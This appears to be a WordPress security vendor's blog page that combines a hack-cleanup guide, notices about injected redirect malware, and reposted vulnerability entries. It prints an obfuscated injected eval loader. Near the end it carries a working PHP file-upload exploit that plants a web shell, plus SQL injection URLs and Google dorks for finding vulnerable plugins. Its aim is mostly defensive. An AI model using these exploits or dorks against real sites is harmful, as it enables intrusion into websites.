How to Clean a Hacked WordPress website in 10 simple steps.

Do you think your WordPress has been hacked?

If you think that your WordPress website is hacked and you confirmed this feeling or suspicion using any security plugins or website malware scanners such as our free malware scanner located at https://scan.attacker.net then it’s better to ask a professional to clean your website to ensure it’s fully and properly cleaned and SEO remains unaffected. Feel free to take a look at our website malware removal service and https://attacker.net/website-security-plans-pricing

Or feel free to try and follow the below steps if you want to try cleaning it yourself:

How to tell and determine if your website was hacked?

  • Do you see any strange, unrecognized or inappropriate content on your site?
  • Your site started consuming more resources or running slow?
  • Do you see unrecognized users, admin users, FTP or email accounts on your site?
  • Unrecognized files or folders?
  • Customer reporting stolen credit card after purchasing something from your website?
  • Google Chrome, Firefox or other browsers showing a red warning when visiting your website?
  • Do you see any unrecognized ads, popups or redirects to other sites?
  • Your hosting provider suspended your hosting account?
  • If your site is listed as hacked or harmful in Google searches.
  • If you receive a warning from Google webmaster tools or other blacklists.
  • If Google Adwords suspended your running Ads.

You can check your website security by using this free website malware scanner https://scan.attacker.net

WordPress Hack repair and malware removal steps:

1- The most important step is to stay calm and focused. Stress is a counterproductive. Take a deep breath and continue reading.

2- It’s very important to generate a full website and database backup.

3- Get a fresh WordPress copy from https://wordpress.org/download/ and start with replacing your WordPress core folders such as:

  • /wp-admin
  • /wp-includes


Most WordPress malware infections are targeting the core files and folders. If the malware/hack issue remains then you need to check and investigate your wp-content folder and all themes and plugins that you use on the website. If it continues, then you need to check your database too. You may also need to check your index.php , wp-config.php and .htaccess file and other common files for any inserted and injected malware.

compare your current live files to the fresh copy you just downloaded using diff Linux command or file comparison tools such as DiffNow or similar tools. Check all reported and infected files and clean or replace it with a clean copy.

4- Update and upgrade WordPress, themes and plugins once you clean and remove the malware/hack. Remove any themes or plugins you don’t use.

5- Review your administrator users for any hidden fake admin users created by the hackers. Make sure to change all of your passwords.

6- Review your plugins and make sure you recognize all of it, Fake plugins installed and placed by hackers are very common. Remove any plugins you don’t use.

7- Once you are done cleaning your website, It’s the time to make a full website backup including database backup.

8- Scan your computer using a good anti-virus software.

9- Check if your website is blacklisted by any search engines or blacklists / anti-virus vendors (Google, Bing, Norton, McAfee, Yandex, etc) and submit reconsideration and reindexing requests whenever needed to make sure your SEO and ranking is not affected by the hack.

10- Stay current and up2date, Keep your wordPress, plugins, themes and everything updated and frequently change your passwords.

Signup now and let’s clean & protect your websites!

You can check your website security by using this free website malware scanner

https://scan.attacker.net

adrequest[.]xyz Malware hitting WordPress websites

We found this new malware targeting hundreds of WordPress installations, So far it’s found in the database and in core files.

Here is an example of it:


var _0x43tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, ..

REMOVED…

41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));

It’s then loading this javascript file and causing random redirects to other websites:

hxxps://adrequest[.]xyz/ad.js

hxxps://adrequest[.]xyz/lady.php

This domain is newly registered:

Domain Name: ADREQUEST[.]XYZ
Registry Domain ID: D91391898-CNIC
Registrar WHOIS Server: whois.PublicDomainRegistry.com
Registrar URL: https://publicdomainregistry.com
Updated Date: 2019-01-19T12:14:39.0Z
Creation Date: 2019-01-19T12:12:28.0Z
Registry Expiry Date: 2020-01-19T23:59:59.0Z


You can use this free malware scanner to determine if your website is infected by this malware or not: 

https://scan.attacker.net

Sign up now and let us take care of that for your and get your website cleaned immediately!

https://attacker.net/website-security-plans-pricing


How to Tell if Your Website Has Been Hacked

How to tell if your website has been hacked?

  • Do you see any strange, unrecognized or inappropriate content on your site?
  • Your site started consuming more resources or running slow?
  • Do you see unrecognized users, admin users, FTP or email accounts on your site?
  • Unrecognized files or folders?
  • Customer reporting stolen credit card after purchasing something from your website?
  • Google Chrome, Firefox or other browsers showing a red warning when visiting your website?
  • Do you see any unrecognized ads, popups or redirects to other sites?
  • Your hosting provider suspended your hosting account?
  • If your site is listed as hacked or harmful in Google searches.
  • If you recieve a warning from Google webmaster tools or other blacklists.
  • If Google Adwords suspended your running Ads.

There are so many other signs! Signup now and let’s clean & protect your websites!

You can check your website’s security by using this free website malware scanner

https://scan.attacker.net

WordPress 5.0.3 is now available!

5.0.3 is a maintenance release that includes 37 bug fixes and 7 performance updates. The focus of this release was fine-tuning the new block editor, and fixing any major bugs or regressions.

Here are a few of the highlights:

For a full list of changes, please consult the list of tickets on Trac, changelog, or read a more technical summary on the Make WordPress Core blog.

You can download WordPress 5.0.3 or visit Dashboard → Updates on your site and click Update Now. Sites that support automatic background updates have already started to update automatically.

A new wave of the simpleoneline Malware

A new wave of the https://simpleoneline[.]online/online.js malware has been discovered hitting hundreds of WordPress websites. In most cases, it’s injected in the database and particularly found in the options table.

Check if your website is infected using this free malware scanner:

https://scan.attacker.net

Take a look at our malware removal service and https://attacker.net/website-security-plans-pricing

WordPress theme directory traversal

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php.

 

 

Timeline

February 11, 2015 NVD published advisory

Authority references

Exploits

 

WordPress plug-in arbitrary code execution

Multiple cross-site scripting (XSS) vulnerabilities in the Spider Facebook plugin before 1.0.11 for WordPress allow (1) remote attackers to inject arbitrary web script or HTML via the appid parameter in a registration task to the default URI or remote administrators to inject arbitrary web script or HTML via the (2) asc_or_desc, (3) order_by, (4) page_number, (5) serch_or_not, or (6) search_events_by_title parameter in (a) the Spider_Facebook_manage page to wp-admin/admin.php or a (b) selectpagesforfacebook or (c) selectpostsforfacebook action to wp-admin/admin-ajax.php.

 

WordPress WP Realty Plugin – Blind SQL Injection

# Exploit Title: WordPress - wp-realty - MySQL Time Based Injection

# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]

WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability

A arbitrary file upload web vulnerability is detected in the CodeCanyon WordPress Plugin Complete Gallery Manager v3.3.3 Web-Application.

The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on
application-side of the service.
The vulnerability is located in the /plugins/complete-gallery-manager/frames/ path when processing to upload via the  upload-images.php
file own malicious context or webshells. After the upload the remote attacker can access the file with one extension and exchange it with the
other one to execute for example php codes.
Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard).
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.
Vulnerable Application(s):
                [+] CodeCanyon - Complete Gallery Manager
Vulnerable Module(s):
                [+] Image File Upload
Vulnerable File(s):
                [+] upload-images.php
Affected Module(s):
                [+] Application Index Listing (http://localhost:8000/)
Proof of Concept:
=================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For demonstration or reproduce ...
Vuln page :
http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Exploit :
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Upload Access Path : http://wordpress.localhost:8080/wp-content/2013/09/up.php
Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/
Reference(s):
http://xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://www.xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://xxx.org/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Risk:
=====
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).